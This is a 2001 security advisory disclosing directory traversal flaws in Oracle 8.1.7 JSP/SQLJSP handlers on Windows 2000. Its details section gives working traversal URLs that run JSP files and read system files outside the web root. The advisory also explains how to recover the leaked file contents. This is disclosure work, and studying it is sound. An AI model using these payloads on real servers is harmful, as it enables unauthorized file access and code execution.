Oracle JSP/SQLJS handlers allow viewing files and executing JSP outside the web root

cyrillic logo
Home
Security
Internet Explorer
Windows 2000
AIX
Netscape
Other
Greets
About me
In the news
Contact
guninski@guninski.com
Georgi Guninski security advisory #36, 2001

Oracle JSP/SQLJS handlers allow viewing files and executing JSP outside the web root

Systems affected:
Oracle JSP/SQLJP handlers, installed by default Oracle 8.1.7 Windows 2000 Have not tested on other versions but they may be vulnerable 

Risk: High
Date: 22 January 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or  indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof.
 

Description:
It is possible to view files outside the web root.
Also possible is execution of .JSP files outside the web root in the same partiotion as
the web server's root.
 

Details:
I guess there are at least 2 vulnerabilities with JSP/SQLJSP handlers.
Basically these are directory traversal vulnerabilities.
1) The following URL:
---------------------------------------
http://oraclehost/servlet//..//../o.jsp
---------------------------------------
will execute c:\o.jsp if there is such file.
As a side effect this shall create the directory C:\servlet\_pages\_servlet and shall put
in it the java source and .class file of o.jsp

2) The following URL:
-------------------------------------------------------------
http://oraclehost/a.jsp//..//..//..//..//..//../winnt/win.ini
-------------------------------------------------------------
shall read c:\winnt\win.ini. It is normal to receive an error to this request. To see the result
go to: http://oraclehost/_pages and look in the directories for .java files containing "win"

3) The following URL:
-----------------------------------------------------------------
http://oraclehost/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
-----------------------------------------------------------------
shall read c:\winnt\win.ini. It is normal to receive an error to this request. To see the result
go to: http://oraclehost/_pages and look in the directories for .java files containing "win"

Note: all urls were tested with Netscape 4.76 or direct HTTP requests. Do not work with IE.
 

Vendor status:
Oracle was contacted on 18 January 2001.

Regards,
Georgi Guninski
http://www.guninski.com


 
 

| Home | Internet Explorer | Windows 2000 | AIX | Netscape | Greets | More... |